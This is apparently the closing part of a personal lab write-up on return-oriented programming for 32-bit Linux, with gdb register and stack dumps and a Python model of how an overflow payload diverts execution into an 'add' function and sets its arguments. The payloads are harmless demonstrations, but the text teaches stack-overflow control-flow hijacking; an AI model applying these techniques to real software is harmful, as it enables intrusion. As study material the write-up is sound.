0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048417 <add+12>:  pop    ebp
   0x8048418 <add+13>:  ret
eax            0x5      5
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048417        0x8048417 <add+12>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048417 in add ()
(gdb)
0xffffd654:     0x41414141      0x00000005      0x00000003      0x42424242
0xffffd664:     0xffffd654      0x00000000      0xf7e31637      0xf7fc9000
0xffffd674:     0xf7fc9000      0x00000000      0xf7e31637      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xfb2060b9      0xc2a68ea9      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x8048418 <add+13>:  ret
   0x8048419 <main>:    lea    ecx,[esp+0x4]
eax            0x5      5
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048418        0x8048418 <add+13>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048418 in add ()

Finally eax holds 5. That is the value the add function returns.
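To make the frame-layout point concrete, here is an added Python 3 model (not the page's own code) that replays main's epilogue and add's prologue over both payload layouts seen above and reports what add reads at [ebp+0x8] and [ebp+0xc]. The addresses come from the gdb session above; the 20-byte offset of main's saved ecx slot is derived from ebp=0xffffd668 and buffer=0xffffd650 in the dumps, and the zero old-ebp value mirrors this run.

```python
import struct

# Values taken from the gdb session above (this model is added here, not the page's own code).
ADD_FUNC = 0x0804840b        # address of add()
BUF_ADDR = 0xffffd650        # main's buffer[16], where gets() writes
SAVED_ECX_OFF = 20           # main's [ebp-0x4] slot: 0xffffd664 - 0xffffd650
SCRATCH = 64                 # constructed zero padding so reads past the payload are defined


def p32(value):
    """Pack a dword little-endian, as struct.pack("I") does on x86."""
    return struct.pack("<I", value & 0xffffffff)


def frame_seen_by_add(payload):
    """Replay main's epilogue and add's prologue on a modelled stack.

    main ends with:  mov ecx,[ebp-0x4] ; leave ; lea esp,[ecx-0x4] ; ret
    add begins with: push ebp ; mov ebp,esp ; mov eax,[ebp+0xc] ; add [ebp+0x8],eax
    Returns what add would see: new eip, a, b, a+b, and the dword its own ret pops.
    """
    mem = bytearray(payload) + bytes(SCRATCH)

    def rd(addr):
        return struct.unpack_from("<I", mem, addr - BUF_ADDR)[0]

    ecx = rd(BUF_ADDR + SAVED_ECX_OFF)   # mov ecx,[ebp-0x4]: the slot the payload overwrote
    esp = ecx - 4                        # lea esp,[ecx-0x4]
    eip = rd(esp)                        # ret: pop eip
    esp += 4
    esp -= 4                             # push ebp (old ebp was 0x0 in the page's run)
    struct.pack_into("<I", mem, esp - BUF_ADDR, 0)
    ebp = esp                            # mov ebp,esp
    a = rd(ebp + 0x8)                    # first argument slot
    b = rd(ebp + 0xc)                    # second argument slot
    return {"eip": eip, "a": a, "b": b,
            "sum": (a + b) & 0xffffffff,
            "ret_to": rd(ebp + 0x4)}     # slot add's ret will pop: the saved return pointer


def payload_without_srp_slot():
    """The first attempt above: add's address directly followed by 2 and 3."""
    return (p32(ADD_FUNC) + p32(2) + p32(3) + b"DDDD" + b"EEEE"
            + p32(BUF_ADDR + 4) + b"GGGG")


def payload_with_srp_slot():
    """The corrected layout: a saved-return-pointer slot between add's address and its arguments."""
    return (p32(ADD_FUNC) + b"AAAA" + p32(2) + p32(3) + b"BBBB"
            + p32(BUF_ADDR + 4))


if __name__ == "__main__":
    for name, build in (("without srp slot", payload_without_srp_slot),
                        ("with srp slot", payload_with_srp_slot)):
        f = frame_seen_by_add(build())
        print("%-17s eip=%#010x a=%#x b=%#x sum=%#x ret_to=%#x"
              % (name, f["eip"], f["a"], f["b"], f["sum"], f["ret_to"]))
```

The first layout reproduces the 0x44444447 seen in eax above (b was read from the "DDDD" slot); the corrected layout gives a=2, b=3 and the sum 5.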

The reason I wrote this up is that it does not behave like the earlier labs. What I ran it on is:

root@exploitdev:~/ROP# uname -a
Linux exploitdev 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Also, to move forward we cannot just watch tutorials and type along with what they show. We need to know for ourselves what is going on. When I asked LiveOverflow, the questions he asked back made me realise there were things I had not thought about and did not yet understand.

That is why I worked through it myself until I understood it properly.

I want you to understand it the same way 😀 It got a bit long because, while doing it myself, I showed every mistake I made along the way.

Thanks
